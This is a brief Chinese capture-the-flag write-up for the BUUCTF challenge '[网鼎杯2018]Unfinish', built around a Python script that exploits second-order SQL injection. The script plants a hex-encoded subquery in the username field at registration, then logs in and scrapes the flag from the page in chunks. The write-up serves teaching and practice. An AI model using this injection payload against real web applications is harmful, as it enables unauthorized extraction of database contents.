BUUCTF-WEB [网鼎杯2018]Unfinish 1

考点

二次注入

解题脚本

import requests,re

flag_hex = ''

# email=a9%40qq.com&username='%2bsubstr((hex(hex((select * from flag))))from 1 for 10)%2b'&password=1
url_reg = "http://024137a8-4186-4739-8cd8-41f6374a9248.node4.buuoj.cn:81/register.php"
url_login = "http://024137a8-4186-4739-8cd8-41f6374a9248.node4.buuoj.cn:81/login.php"

for i in range(100):
    reg_data = {
        'email': 'b%d@qq.com'%(i),
        'username': "'+substr((hex(hex((select * from flag))))from %d for 10)+'"%(i*10+1),
        'password': '1'
    }
    requests.post(url=url_reg, data=reg_data)

    data_login = {
        'email': 'b%d@qq.com'%(i),
        'password': '1'
    }
    res = requests.post(url=url_login, data=data_login)
    res = re.findall(r'<span class="user-name">(.*?)</span>', res.text,re.S)[0].strip()
    print(res)
    if res == '0':
        break
    flag_hex +=res
    

print(flag_hex)

得到的结果再进行两次hex解码就能得到flag。